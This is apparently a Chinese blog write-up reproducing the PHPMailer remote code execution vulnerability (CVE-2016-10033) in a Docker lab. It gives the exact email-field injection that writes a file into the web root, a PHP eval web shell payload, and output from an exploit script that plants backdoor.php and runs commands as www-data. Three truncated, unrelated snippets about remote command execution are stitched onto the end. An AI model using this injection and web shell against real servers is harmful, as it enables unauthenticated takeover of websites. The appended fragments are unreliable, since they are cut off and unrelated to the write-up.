phpmailer遠端命令執行漏洞復現
一、漏洞簡介
phpmailer是php電子郵件建立及傳輸類,用於多個開源專案:wordpress, drupal, 1crm, sugarcrm, yii, joomla!等。
phpmailer < 5.2.18版本存在安全漏洞,可使未經身份驗證的遠端攻擊者在web伺服器使用者上下文中執行任意**,遠端控制目標web應用。
二、影響版本:
phpmailer<5.2.18
三、漏洞復現
docker環境:
dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033
拉去映象啟動環境:
在name處隨便輸入比如「aaa」,在email處輸入:"aaa". -oqueuedirectory=/tmp/. -x/var/www/html/a.php @aaa.com在message處輸入一句話木馬:<?php@eval($_post['thelostworld']);?>
上傳完一句話木馬後,頁面會響應3-5分鐘,響應時間較長
虛擬終端:
使用指令碼:
獲取指令碼後台回覆「phpmailer」獲取指令碼
➜ desktop ./exploit.sh192.168.1.107:8080[+] cve-2016-10033exploitbyopsxcq[+] exploiting192.168.1.107:8080[+] target exploited, acessing shell at backdoor.php[+] checkingifthe backdoor was createdontarget system[+] backdoor.php foundonremote system[+] running whoamiwww-dataremoteshell> [+] running remoteshell> id[+] running iduid=33(www-data) gid=33(www-data) groups=33(www-data)
backdoor.php
參考:thelostworld
安全路上,與你並肩前行!!!!
個人知乎:
個人csdn:
個人:freebuf主頁:
遠端執行命令
遠端執行命令 這個分兩步,很簡單很實用。第一步,設定ssh免認證,免認證就是只不用密碼認證就可以直接登入,這在寫指令碼伺服器控制時特別有用。ssh keygen t rsa cd ssh ssh copy id xuexi01注 xuexi01是主機名,也可寫成ip,如192.168.2.11 第二...
遠端執行命令
一 需求 server 下發命令 client 執行命令 ssh協議 import os ret os.popen ls read print ret import subprocess 內建模組 和os模組的功能有相似之處 能執行作業系統的命令的功能 ret subprocess.popen di...
遠端執行命令
伺服器 遠端執行命令 from socket import import subprocess ip port 127.0.0.1 8080 back log 5buffer size 1024tcp server socket af inet,sock stream tcp server.bind...